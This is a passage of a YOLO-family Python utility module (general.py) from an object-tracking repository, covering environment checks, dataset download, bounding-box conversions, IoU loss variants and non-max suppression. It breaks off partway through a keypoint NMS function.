# general.py (from repo TheNobody-12/MOT_WITH_YOLOV9_STRONG_SORT, GPL-3.0)
# YOLOR general utils
import glob
import logging
import math
import os
import platform
import random
import re
import subprocess
import time
from pathlib import Path
import cv2
import numpy as np
import pandas as pd
import torch
import torchvision
import yaml
# Settings
torch.set_printoptions(linewidth=320, precision=5, profile='long')
np.set_printoptions(linewidth=320, formatter={'float_kind': '{:11.5g}'.format}) # format short g, %precision=5
pd.options.display.max_columns = 10
cv2.setNumThreads(0) # prevent OpenCV from multithreading (incompatible with PyTorch DataLoader)
os.environ['NUMEXPR_MAX_THREADS'] = str(min(os.cpu_count(), 8)) # NumExpr max threads
def set_logging(rank=-1):
logging.basicConfig(
format="%(message)s",
level=logging.INFO if rank in [-1, 0] else logging.WARN)
def init_seeds(seed=0):
# Initialize random number generator (RNG) seeds
random.seed(seed)
np.random.seed(seed)
init_torch_seeds(seed)
def get_latest_run(search_dir='.'):
# Return path to most recent 'last.pt' in /runs (i.e. to --resume from)
last_list = glob.glob(f'{search_dir}/**/last*.pt', recursive=True)
return max(last_list, key=os.path.getctime) if last_list else ''
def isdocker():
# Is environment a Docker container
return Path('/workspace').exists() # or Path('/.dockerenv').exists()
def emojis(str=''):
# Return platform-dependent emoji-safe version of string
return str.encode().decode('ascii', 'ignore') if platform.system() == 'Windows' else str
def check_online():
# Check internet connectivity
import socket
try:
        socket.create_connection(("1.1.1.1", 443), 5)  # check host accessibility
return True
except OSError:
return False
def check_git_status():
# Recommend 'git pull' if code is out of date
print(colorstr('github: '), end='')
try:
assert Path('.git').exists(), 'skipping check (not a git repository)'
assert not isdocker(), 'skipping check (Docker image)'
assert check_online(), 'skipping check (offline)'
cmd = 'git fetch && git config --get remote.origin.url'
        url = re.sub(r'\.git$', '', subprocess.check_output(cmd, shell=True).decode().strip())  # github repo url
branch = subprocess.check_output('git rev-parse --abbrev-ref HEAD', shell=True).decode().strip() # checked out
n = int(subprocess.check_output(f'git rev-list {branch}..origin/master --count', shell=True)) # commits behind
if n > 0:
s = f"⚠️ WARNING: code is out of date by {n} commit{'s' * (n > 1)}. " \
f"Use 'git pull' to update or 'git clone {url}' to download latest."
else:
s = f'up to date with {url} ✅'
print(emojis(s)) # emoji-safe
except Exception as e:
print(e)
def check_requirements(requirements='requirements.txt', exclude=()):
# Check installed dependencies meet requirements (pass *.txt file or list of packages)
import pkg_resources as pkg
prefix = colorstr('red', 'bold', 'requirements:')
if isinstance(requirements, (str, Path)): # requirements.txt file
file = Path(requirements)
if not file.exists():
print(f"{prefix} {file.resolve()} not found, check failed.")
return
requirements = [f'{x.name}{x.specifier}' for x in pkg.parse_requirements(file.open()) if x.name not in exclude]
else: # list or tuple of packages
requirements = [x for x in requirements if x not in exclude]
n = 0 # number of packages updates
for r in requirements:
try:
pkg.require(r)
except Exception as e: # DistributionNotFound or VersionConflict if requirements not met
n += 1
print(f"{prefix} {e.req} not found and is required by YOLOR, attempting auto-update...")
print(subprocess.check_output(f"pip install '{e.req}'", shell=True).decode())
if n: # if packages updated
source = file.resolve() if 'file' in locals() else requirements
s = f"{prefix} {n} package{'s' * (n > 1)} updated per {source}\n" \
f"{prefix} ⚠️ {colorstr('bold', 'Restart runtime or rerun command for updates to take effect')}\n"
print(emojis(s)) # emoji-safe
def check_img_size(img_size, s=32):
# Verify img_size is a multiple of stride s
new_size = make_divisible(img_size, int(s)) # ceil gs-multiple
if new_size != img_size:
print('WARNING: --img-size %g must be multiple of max stride %g, updating to %g' % (img_size, s, new_size))
return new_size
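# Usage sketch (illustrative, not part of the original file): check_img_size rounds a
# requested --img-size up to the nearest stride multiple via make_divisible, e.g.:
#   check_img_size(641, s=32)  # warns and returns 672 (21 * 32)
#   check_img_size(640, s=32)  # returns 640 unchanged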
def check_imshow():
# Check if environment supports image displays
try:
assert not isdocker(), 'cv2.imshow() is disabled in Docker environments'
cv2.imshow('test', np.zeros((1, 1, 3)))
cv2.waitKey(1)
cv2.destroyAllWindows()
cv2.waitKey(1)
return True
except Exception as e:
print(f'WARNING: Environment does not support cv2.imshow() or PIL Image.show() image displays\n{e}')
return False
def check_file(file):
# Search for file if not found
if Path(file).is_file() or file == '':
return file
else:
files = glob.glob('./**/' + file, recursive=True) # find file
assert len(files), f'File Not Found: {file}' # assert file was found
assert len(files) == 1, f"Multiple files match '{file}', specify exact path: {files}" # assert unique
return files[0] # return file
def check_dataset(dict):
# Download dataset if not found locally
val, s = dict.get('val'), dict.get('download')
if val and len(val):
val = [Path(x).resolve() for x in (val if isinstance(val, list) else [val])] # val path
if not all(x.exists() for x in val):
print('\nWARNING: Dataset not found, nonexistent paths: %s' % [str(x) for x in val if not x.exists()])
if s and len(s): # download script
print('Downloading %s ...' % s)
if s.startswith('http') and s.endswith('.zip'): # URL
f = Path(s).name # filename
torch.hub.download_url_to_file(s, f)
r = os.system('unzip -q %s -d ../ && rm %s' % (f, f)) # unzip
else: # bash script
r = os.system(s)
print('Dataset autodownload %s\n' % ('success' if r == 0 else 'failure')) # analyze return value
else:
raise Exception('Dataset not found.')
def make_divisible(x, divisor):
# Returns x evenly divisible by divisor
return math.ceil(x / divisor) * divisor
def clean_str(s):
# Cleans a string by replacing special characters with underscore _
return re.sub(pattern="[|@#!¡·$€%&()=?¿^*;:,¨´><+]", repl="_", string=s)
def one_cycle(y1=0.0, y2=1.0, steps=100):
# lambda function for sinusoidal ramp from y1 to y2
return lambda x: ((1 - math.cos(x * math.pi / steps)) / 2) * (y2 - y1) + y1
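# Usage sketch (illustrative, not part of the original file): the returned lambda is
# typically handed to a LambdaLR scheduler in the training script; `hyp` and `epochs`
# below are assumed to come from that script:
#   lf = one_cycle(1, hyp['lrf'], epochs)  # cosine ramp 1 -> hyp['lrf']
#   scheduler = torch.optim.lr_scheduler.LambdaLR(optimizer, lr_lambda=lf)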
def colorstr(*input):
# Colors a string https://en.wikipedia.org/wiki/ANSI_escape_code, i.e. colorstr('blue', 'hello world')
*args, string = input if len(input) > 1 else ('blue', 'bold', input[0]) # color arguments, string
colors = {'black': '\033[30m', # basic colors
'red': '\033[31m',
'green': '\033[32m',
'yellow': '\033[33m',
'blue': '\033[34m',
'magenta': '\033[35m',
'cyan': '\033[36m',
'white': '\033[37m',
'bright_black': '\033[90m', # bright colors
'bright_red': '\033[91m',
'bright_green': '\033[92m',
'bright_yellow': '\033[93m',
'bright_blue': '\033[94m',
'bright_magenta': '\033[95m',
'bright_cyan': '\033[96m',
'bright_white': '\033[97m',
'end': '\033[0m', # misc
'bold': '\033[1m',
'underline': '\033[4m'}
return ''.join(colors[x] for x in args) + f'{string}' + colors['end']
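# Usage sketch (illustrative, not part of the original file): colorstr wraps a string
# in ANSI escape codes, defaulting to blue + bold when only the string is passed:
#   print(colorstr('hello world'))                 # blue bold 'hello world'
#   print(colorstr('red', 'underline', 'error'))   # red underlined 'error'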
def labels_to_class_weights(labels, nc=80):
# Get class weights (inverse frequency) from training labels
if labels[0] is None: # no labels loaded
return torch.Tensor()
labels = np.concatenate(labels, 0) # labels.shape = (866643, 5) for COCO
    classes = labels[:, 0].astype(int)  # labels = [class xywh]; np.int was removed in NumPy 1.24+
weights = np.bincount(classes, minlength=nc) # occurrences per class
# Prepend gridpoint count (for uCE training)
# gpi = ((320 / 32 * np.array([1, 2, 4])) ** 2 * 3).sum() # gridpoints per image
# weights = np.hstack([gpi * len(labels) - weights.sum() * 9, weights * 9]) ** 0.5 # prepend gridpoints to start
weights[weights == 0] = 1 # replace empty bins with 1
weights = 1 / weights # number of targets per class
weights /= weights.sum() # normalize
return torch.from_numpy(weights)
def labels_to_image_weights(labels, nc=80, class_weights=np.ones(80)):
# Produces image weights based on class_weights and image contents
    class_counts = np.array([np.bincount(x[:, 0].astype(int), minlength=nc) for x in labels])
image_weights = (class_weights.reshape(1, nc) * class_counts).sum(1)
# index = random.choices(range(n), weights=image_weights, k=1) # weight image sample
return image_weights
def coco80_to_coco91_class(): # converts 80-index (val2014) to 91-index (paper)
# https://tech.amikelive.com/node-718/what-object-categories-labels-are-in-coco-dataset/
# a = np.loadtxt('data/coco.names', dtype='str', delimiter='\n')
# b = np.loadtxt('data/coco_paper.names', dtype='str', delimiter='\n')
# x1 = [list(a[i] == b).index(True) + 1 for i in range(80)] # darknet to coco
# x2 = [list(b[i] == a).index(True) if any(b[i] == a) else None for i in range(91)] # coco to darknet
x = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 27, 28, 31, 32, 33, 34,
35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63,
64, 65, 67, 70, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 84, 85, 86, 87, 88, 89, 90]
return x
def xyxy2xywh(x):
# Convert nx4 boxes from [x1, y1, x2, y2] to [x, y, w, h] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = (x[:, 0] + x[:, 2]) / 2 # x center
y[:, 1] = (x[:, 1] + x[:, 3]) / 2 # y center
y[:, 2] = x[:, 2] - x[:, 0] # width
y[:, 3] = x[:, 3] - x[:, 1] # height
return y
def xywh2xyxy(x):
# Convert nx4 boxes from [x, y, w, h] to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = x[:, 0] - x[:, 2] / 2 # top left x
y[:, 1] = x[:, 1] - x[:, 3] / 2 # top left y
y[:, 2] = x[:, 0] + x[:, 2] / 2 # bottom right x
y[:, 3] = x[:, 1] + x[:, 3] / 2 # bottom right y
return y
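# Usage sketch (illustrative, not part of the original file): both converters accept an
# (n, 4) np.ndarray or torch.Tensor and return the same type:
#   b = np.array([[50., 50., 20., 10.]])  # center x, center y, width, height
#   xywh2xyxy(b)                          # -> [[40., 45., 60., 55.]]
#   xyxy2xywh(xywh2xyxy(b))               # round-trips back to b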
def xywhn2xyxy(x, w=640, h=640, padw=0, padh=0):
# Convert nx4 boxes from [x, y, w, h] normalized to [x1, y1, x2, y2] where xy1=top-left, xy2=bottom-right
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * (x[:, 0] - x[:, 2] / 2) + padw # top left x
y[:, 1] = h * (x[:, 1] - x[:, 3] / 2) + padh # top left y
y[:, 2] = w * (x[:, 0] + x[:, 2] / 2) + padw # bottom right x
y[:, 3] = h * (x[:, 1] + x[:, 3] / 2) + padh # bottom right y
return y
def xyn2xy(x, w=640, h=640, padw=0, padh=0):
# Convert normalized segments into pixel segments, shape (n,2)
y = x.clone() if isinstance(x, torch.Tensor) else np.copy(x)
y[:, 0] = w * x[:, 0] + padw # top left x
y[:, 1] = h * x[:, 1] + padh # top left y
return y
def segment2box(segment, width=640, height=640):
# Convert 1 segment label to 1 box label, applying inside-image constraint, i.e. (xy1, xy2, ...) to (xyxy)
x, y = segment.T # segment xy
inside = (x >= 0) & (y >= 0) & (x <= width) & (y <= height)
x, y, = x[inside], y[inside]
return np.array([x.min(), y.min(), x.max(), y.max()]) if any(x) else np.zeros((1, 4)) # xyxy
def segments2boxes(segments):
# Convert segment labels to box labels, i.e. (cls, xy1, xy2, ...) to (cls, xywh)
boxes = []
for s in segments:
x, y = s.T # segment xy
boxes.append([x.min(), y.min(), x.max(), y.max()]) # cls, xyxy
return xyxy2xywh(np.array(boxes)) # cls, xywh
def resample_segments(segments, n=1000):
# Up-sample an (n,2) segment
for i, s in enumerate(segments):
s = np.concatenate((s, s[0:1, :]), axis=0)
x = np.linspace(0, len(s) - 1, n)
xp = np.arange(len(s))
segments[i] = np.concatenate([np.interp(x, xp, s[:, i]) for i in range(2)]).reshape(2, -1).T # segment xy
return segments
def scale_coords(img1_shape, coords, img0_shape, ratio_pad=None):
# Rescale coords (xyxy) from img1_shape to img0_shape
if ratio_pad is None: # calculate from img0_shape
gain = min(img1_shape[0] / img0_shape[0], img1_shape[1] / img0_shape[1]) # gain = old / new
pad = (img1_shape[1] - img0_shape[1] * gain) / 2, (img1_shape[0] - img0_shape[0] * gain) / 2 # wh padding
else:
gain = ratio_pad[0][0]
pad = ratio_pad[1]
coords[:, [0, 2]] -= pad[0] # x padding
coords[:, [1, 3]] -= pad[1] # y padding
coords[:, :4] /= gain
clip_coords(coords, img0_shape)
return coords
def clip_coords(boxes, img_shape):
    # Clip xyxy bounding boxes to image shape (height, width)
boxes[:, 0].clamp_(0, img_shape[1]) # x1
boxes[:, 1].clamp_(0, img_shape[0]) # y1
boxes[:, 2].clamp_(0, img_shape[1]) # x2
boxes[:, 3].clamp_(0, img_shape[0]) # y2
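# Usage sketch (illustrative, not part of the original file): in a typical detect loop,
# boxes predicted on the letterboxed tensor `img` are mapped back onto the original
# frame `im0` before drawing (det holds xyxy boxes in its first four columns):
#   det[:, :4] = scale_coords(img.shape[2:], det[:, :4], im0.shape).round()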
def bbox_iou(box1, box2, x1y1x2y2=True, GIoU=False, DIoU=False, CIoU=False, eps=1e-7):
# Returns the IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
iou = inter / union
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = cw ** 2 + ch ** 2 + eps # convex diagonal squared
rho2 = ((b2_x1 + b2_x2 - b1_x1 - b1_x2) ** 2 +
(b2_y1 + b2_y2 - b1_y1 - b1_y2) ** 2) / 4 # center distance squared
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / (h2 + eps)) - torch.atan(w1 / (h1 + eps)), 2)
with torch.no_grad():
alpha = v / (v - iou + (1 + eps))
return iou - (rho2 / c2 + v * alpha) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
c_area = cw * ch + eps # convex area
return iou - (c_area - union) / c_area # GIoU
else:
return iou # IoU
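# Usage sketch (illustrative, not part of the original file): bbox_iou compares one box
# against n boxes and is the kind of call the box-regression loss uses for its CIoU term:
#   pbox = torch.tensor([10., 10., 20., 20.])        # predicted box, xyxy
#   tbox = torch.tensor([[12., 12., 22., 22.],
#                        [100., 100., 120., 120.]])  # target boxes, nx4
#   ciou = bbox_iou(pbox, tbox, x1y1x2y2=True, CIoU=True)  # tensor of 2 CIoU values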
def bbox_alpha_iou(box1, box2, x1y1x2y2=False, GIoU=False, DIoU=False, CIoU=False, alpha=2, eps=1e-9):
    # Returns the alpha-IoU of box1 to box2. box1 is 4, box2 is nx4
box2 = box2.T
# Get the coordinates of bounding boxes
if x1y1x2y2: # x1, y1, x2, y2 = box1
b1_x1, b1_y1, b1_x2, b1_y2 = box1[0], box1[1], box1[2], box1[3]
b2_x1, b2_y1, b2_x2, b2_y2 = box2[0], box2[1], box2[2], box2[3]
else: # transform from xywh to xyxy
b1_x1, b1_x2 = box1[0] - box1[2] / 2, box1[0] + box1[2] / 2
b1_y1, b1_y2 = box1[1] - box1[3] / 2, box1[1] + box1[3] / 2
b2_x1, b2_x2 = box2[0] - box2[2] / 2, box2[0] + box2[2] / 2
b2_y1, b2_y2 = box2[1] - box2[3] / 2, box2[1] + box2[3] / 2
# Intersection area
inter = (torch.min(b1_x2, b2_x2) - torch.max(b1_x1, b2_x1)).clamp(0) * \
(torch.min(b1_y2, b2_y2) - torch.max(b1_y1, b2_y1)).clamp(0)
# Union Area
w1, h1 = b1_x2 - b1_x1, b1_y2 - b1_y1 + eps
w2, h2 = b2_x2 - b2_x1, b2_y2 - b2_y1 + eps
union = w1 * h1 + w2 * h2 - inter + eps
# change iou into pow(iou+eps)
# iou = inter / union
iou = torch.pow(inter/union + eps, alpha)
# beta = 2 * alpha
if GIoU or DIoU or CIoU:
cw = torch.max(b1_x2, b2_x2) - torch.min(b1_x1, b2_x1) # convex (smallest enclosing box) width
ch = torch.max(b1_y2, b2_y2) - torch.min(b1_y1, b2_y1) # convex height
if CIoU or DIoU: # Distance or Complete IoU https://arxiv.org/abs/1911.08287v1
c2 = (cw ** 2 + ch ** 2) ** alpha + eps # convex diagonal
rho_x = torch.abs(b2_x1 + b2_x2 - b1_x1 - b1_x2)
rho_y = torch.abs(b2_y1 + b2_y2 - b1_y1 - b1_y2)
rho2 = ((rho_x ** 2 + rho_y ** 2) / 4) ** alpha # center distance
if DIoU:
return iou - rho2 / c2 # DIoU
elif CIoU: # https://github.com/Zzh-tju/DIoU-SSD-pytorch/blob/master/utils/box/box_utils.py#L47
v = (4 / math.pi ** 2) * torch.pow(torch.atan(w2 / h2) - torch.atan(w1 / h1), 2)
with torch.no_grad():
alpha_ciou = v / ((1 + eps) - inter / union + v)
# return iou - (rho2 / c2 + v * alpha_ciou) # CIoU
return iou - (rho2 / c2 + torch.pow(v * alpha_ciou + eps, alpha)) # CIoU
else: # GIoU https://arxiv.org/pdf/1902.09630.pdf
# c_area = cw * ch + eps # convex area
# return iou - (c_area - union) / c_area # GIoU
c_area = torch.max(cw * ch + eps, union) # convex area
return iou - torch.pow((c_area - union) / c_area + eps, alpha) # GIoU
else:
return iou # torch.log(iou+eps) or iou
def box_iou(box1, box2):
# https://github.com/pytorch/vision/blob/master/torchvision/ops/boxes.py
"""
Return intersection-over-union (Jaccard index) of boxes.
Both sets of boxes are expected to be in (x1, y1, x2, y2) format.
Arguments:
box1 (Tensor[N, 4])
box2 (Tensor[M, 4])
Returns:
iou (Tensor[N, M]): the NxM matrix containing the pairwise
IoU values for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
# inter(N,M) = (rb(N,M,2) - lt(N,M,2)).clamp(0).prod(2)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
return inter / (area1[:, None] + area2 - inter) # iou = inter / (area1 + area2 - inter)
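# Usage sketch (illustrative, not part of the original file): box_iou is the pairwise
# (N x M) variant used by merge-NMS and metric code:
#   a = torch.tensor([[0., 0., 10., 10.]])
#   b = torch.tensor([[0., 0., 10., 10.], [5., 5., 15., 15.]])
#   box_iou(a, b)  # -> tensor([[1.0000, 0.1429]])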
def wh_iou(wh1, wh2):
# Returns the nxm IoU matrix. wh1 is nx2, wh2 is mx2
wh1 = wh1[:, None] # [N,1,2]
wh2 = wh2[None] # [1,M,2]
inter = torch.min(wh1, wh2).prod(2) # [N,M]
return inter / (wh1.prod(2) + wh2.prod(2) - inter) # iou = inter / (area1 + area2 - inter)
def box_giou(box1, box2):
"""
Return generalized intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise generalized IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
areai = whi[:, :, 0] * whi[:, :, 1]
return iou - (areai - union) / areai
def box_ciou(box1, box2, eps: float = 1e-7):
"""
Return complete intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
eps (float, optional): small number to prevent division by zero. Default: 1e-7
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise complete IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps
# centers of boxes
x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2
y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2
x_g = (box2[:, 0] + box2[:, 2]) / 2
y_g = (box2[:, 1] + box2[:, 3]) / 2
# The distance between boxes' centers squared.
centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2
w_pred = box1[:, None, 2] - box1[:, None, 0]
h_pred = box1[:, None, 3] - box1[:, None, 1]
w_gt = box2[:, 2] - box2[:, 0]
h_gt = box2[:, 3] - box2[:, 1]
v = (4 / (torch.pi ** 2)) * torch.pow((torch.atan(w_gt / h_gt) - torch.atan(w_pred / h_pred)), 2)
with torch.no_grad():
alpha = v / (1 - iou + v + eps)
return iou - (centers_distance_squared / diagonal_distance_squared) - alpha * v
def box_diou(box1, box2, eps: float = 1e-7):
"""
Return distance intersection-over-union (Jaccard index) between two sets of boxes.
Both sets of boxes are expected to be in ``(x1, y1, x2, y2)`` format with
``0 <= x1 < x2`` and ``0 <= y1 < y2``.
Args:
boxes1 (Tensor[N, 4]): first set of boxes
boxes2 (Tensor[M, 4]): second set of boxes
eps (float, optional): small number to prevent division by zero. Default: 1e-7
Returns:
Tensor[N, M]: the NxM matrix containing the pairwise distance IoU values
for every element in boxes1 and boxes2
"""
def box_area(box):
# box = 4xn
return (box[2] - box[0]) * (box[3] - box[1])
area1 = box_area(box1.T)
area2 = box_area(box2.T)
inter = (torch.min(box1[:, None, 2:], box2[:, 2:]) - torch.max(box1[:, None, :2], box2[:, :2])).clamp(0).prod(2)
union = (area1[:, None] + area2 - inter)
iou = inter / union
lti = torch.min(box1[:, None, :2], box2[:, :2])
rbi = torch.max(box1[:, None, 2:], box2[:, 2:])
whi = (rbi - lti).clamp(min=0) # [N,M,2]
diagonal_distance_squared = (whi[:, :, 0] ** 2) + (whi[:, :, 1] ** 2) + eps
# centers of boxes
x_p = (box1[:, None, 0] + box1[:, None, 2]) / 2
y_p = (box1[:, None, 1] + box1[:, None, 3]) / 2
x_g = (box2[:, 0] + box2[:, 2]) / 2
y_g = (box2[:, 1] + box2[:, 3]) / 2
# The distance between boxes' centers squared.
centers_distance_squared = (x_p - x_g) ** 2 + (y_p - y_g) ** 2
# The distance IoU is the IoU penalized by a normalized
# distance between boxes' centers squared.
return iou - (centers_distance_squared / diagonal_distance_squared)
def non_max_suppression(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=()):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
nc = prediction.shape[2] - 5 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0, 6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
if nc == 1:
            x[:, 5:] = x[:, 4:5]  # for models with one class, cls_loss is 0 and cls_conf is always 0.5,
                                  # so there is no need to multiply.
else:
x[:, 5:] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
conf, j = x[:, 5:].max(1, keepdim=True)
x = torch.cat((box, conf, j.float()), 1)[conf.view(-1) > conf_thres]
# Filter by class
if classes is not None:
x = x[(x[:, 5:6] == torch.tensor(classes, device=x.device)).any(1)]
# Apply finite constraint
# if not torch.isfinite(x).all():
# x = x[torch.isfinite(x).all(1)]
# Check shape
n = x.shape[0] # number of boxes
if not n: # no boxes
continue
elif n > max_nms: # excess boxes
x = x[x[:, 4].argsort(descending=True)[:max_nms]] # sort by confidence
# Batched NMS
c = x[:, 5:6] * (0 if agnostic else max_wh) # classes
boxes, scores = x[:, :4] + c, x[:, 4] # boxes (offset by class), scores
i = torchvision.ops.nms(boxes, scores, iou_thres) # NMS
if i.shape[0] > max_det: # limit detections
i = i[:max_det]
if merge and (1 < n < 3E3): # Merge NMS (boxes merged using weighted mean)
# update boxes as boxes(i,4) = weights(i,n) * boxes(n,4)
iou = box_iou(boxes[i], boxes) > iou_thres # iou matrix
weights = iou * scores[None] # box weights
x[i, :4] = torch.mm(weights, x[:, :4]).float() / weights.sum(1, keepdim=True) # merged boxes
if redundant:
i = i[iou.sum(1) > 1] # require redundancy
output[xi] = x[i]
if (time.time() - t) > time_limit:
print(f'WARNING: NMS time limit {time_limit}s exceeded')
break # time limit exceeded
return output
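# Usage sketch (illustrative, not part of the original file): `prediction` is the raw
# (batch, n, 5 + nc) model output; NMS returns one (k, 6) tensor of
# [x1, y1, x2, y2, conf, cls] per image. `model` and `img` are assumed to come from the
# surrounding inference code:
#   pred = model(img)[0]
#   det = non_max_suppression(pred, conf_thres=0.25, iou_thres=0.45, classes=[0])[0]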
def non_max_suppression_kpt(prediction, conf_thres=0.25, iou_thres=0.45, classes=None, agnostic=False, multi_label=False,
labels=(), kpt_label=False, nc=None, nkpt=None):
"""Runs Non-Maximum Suppression (NMS) on inference results
Returns:
list of detections, on (n,6) tensor per image [xyxy, conf, cls]
"""
if nc is None:
nc = prediction.shape[2] - 5 if not kpt_label else prediction.shape[2] - 56 # number of classes
xc = prediction[..., 4] > conf_thres # candidates
# Settings
min_wh, max_wh = 2, 4096 # (pixels) minimum and maximum box width and height
max_det = 300 # maximum number of detections per image
max_nms = 30000 # maximum number of boxes into torchvision.ops.nms()
time_limit = 10.0 # seconds to quit after
redundant = True # require redundant detections
multi_label &= nc > 1 # multiple labels per box (adds 0.5ms/img)
merge = False # use merge-NMS
t = time.time()
output = [torch.zeros((0,6), device=prediction.device)] * prediction.shape[0]
for xi, x in enumerate(prediction): # image index, image inference
# Apply constraints
# x[((x[..., 2:4] < min_wh) | (x[..., 2:4] > max_wh)).any(1), 4] = 0 # width-height
x = x[xc[xi]] # confidence
# Cat apriori labels if autolabelling
if labels and len(labels[xi]):
l = labels[xi]
v = torch.zeros((len(l), nc + 5), device=x.device)
v[:, :4] = l[:, 1:5] # box
v[:, 4] = 1.0 # conf
v[range(len(l)), l[:, 0].long() + 5] = 1.0 # cls
x = torch.cat((x, v), 0)
# If none remain process next image
if not x.shape[0]:
continue
# Compute conf
x[:, 5:5+nc] *= x[:, 4:5] # conf = obj_conf * cls_conf
# Box (center x, center y, width, height) to (x1, y1, x2, y2)
box = xywh2xyxy(x[:, :4])
# Detections matrix nx6 (xyxy, conf, cls)
if multi_label:
i, j = (x[:, 5:] > conf_thres).nonzero(as_tuple=False).T
x = torch.cat((box[i], x[i, j + 5, None], j[:, None].float()), 1)
else: # best class only
if not kpt_label:
conf, j = x[:, 5:].max(1, keepdim=True)
